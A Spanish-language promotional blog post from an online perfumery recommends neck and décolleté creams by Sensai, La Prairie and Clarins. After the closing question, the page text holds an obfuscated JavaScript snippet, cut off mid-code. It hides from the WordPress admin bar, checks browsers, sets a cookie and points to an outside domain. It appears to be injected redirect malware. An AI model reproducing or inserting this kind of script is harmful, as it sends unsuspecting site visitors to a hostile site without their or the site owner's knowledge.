crema cuello y escote online

Hoy venimos con un post especial para aquella zona del cuerpo que tan frecuentemente olvidamos de cuidar. Porque los cuidados de la piel no acaban en la barbilla, hoy queremos recordaros que la piel del cuello y del escote es igual de importante.

Además que mejor momento para empezar a cuidarla que ahora que la primavera está presente y comenzamos a lucir prendas más frescas y escotadas, llegando el momento de lucir de cuello y escote.

Tras un largo invierno en el que hemos protegido esa zona con foulards y bufandas, es el momento perfecto para aportarles una dosis extra de cuidados.

Hay que tener en cuenta que la piel del cuello y escote es mucho más fina que la piel del rostro, lo que supone menor cantidad de glándulas sebáceas y de tejido adiposo. Por ello siempre se ha dicho que es el lugar donde primero se nota el envejecimiento de la piel, ya que favorecen la aparición de arrugas y flacidez.

Si a todo esto le añadimos la exposición a los rayos solares, la cosa empeora, pudiendo dar lugar asimismo a pequeñas manchas producidas por un aumento de la melanina.

Para evitar estos problemas y mantener la piel tersa e hidratada es necesario dedicar una mayor atención a estas zonas olvidadas:

  • Algo básico y que no debemos ignorar es desmaquillar la zona con productos delicados que sean cuidadosos con nuestra piel.
  • Aplicaremos protección solar para prevenir el envejecimiento de la piel y la aparición de manchas.
  • Aplicaremos productos específicos para la zona del cuello y escote.

Os presentamos una breve selección que podréis encontrar en nuestra perfumería online Perfumes Tin Tin:

Kanebo/Sensai nos presenta Cellular Performance Throat And Bust: es un tratamiento específico para cuello y escote, que gracias a su fórmula que favorece la síntesis del colágeno y acelera la lipólisis en el cuello, el pecho y el escote, reafirma y define la piel y minimiza las arrugas y las pequeñas manchas.

sensai cuello y escote

 

 

 

 

 

 

 

 

 

 

 

La Prairie nos ofrece Neck Cream Anti Aging una innovadora crema para cuello y escote desarrollada por los científicos de La Prairie, una fórmula que contiene un complejo diseñado para perfilar el área de la barbilla y el cuello y devolverle una imagen más fina y firme. Otros ingredientes actúan para hidratar, suavizar y potenciar un tono de piel uniforme. Con un uso regular nos prometen una piel del cuello más sedosa, suave y tersa.

la prairie cuello

 

 

 

 

 

 

 

 

 

 

 

Desde Clarins encontramos la crema Multi-intensiva Concentré Décolleté et Cou se encarga de rellenar, reafirmar, tersar y devuelve el brillo a la delicada piel del cuello y el escote y recupera el aspecto atractivo y juvenil en las pieles maduras. Su mezcla de extractos específicamente formulada para combatir la edad (Pueraria lobata, bambé y Centella asiatica) potencia la síntesis del colágeno y reduce la flacidez y la aparición de arrugas, asperezas o pérdidas de tono.

clarins crema cuello y escote

 

 

 

 

 

 

 

 

 

 

 

 

Cuéntanos, ¿sigues cuidados específicos para el cuello y escote? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone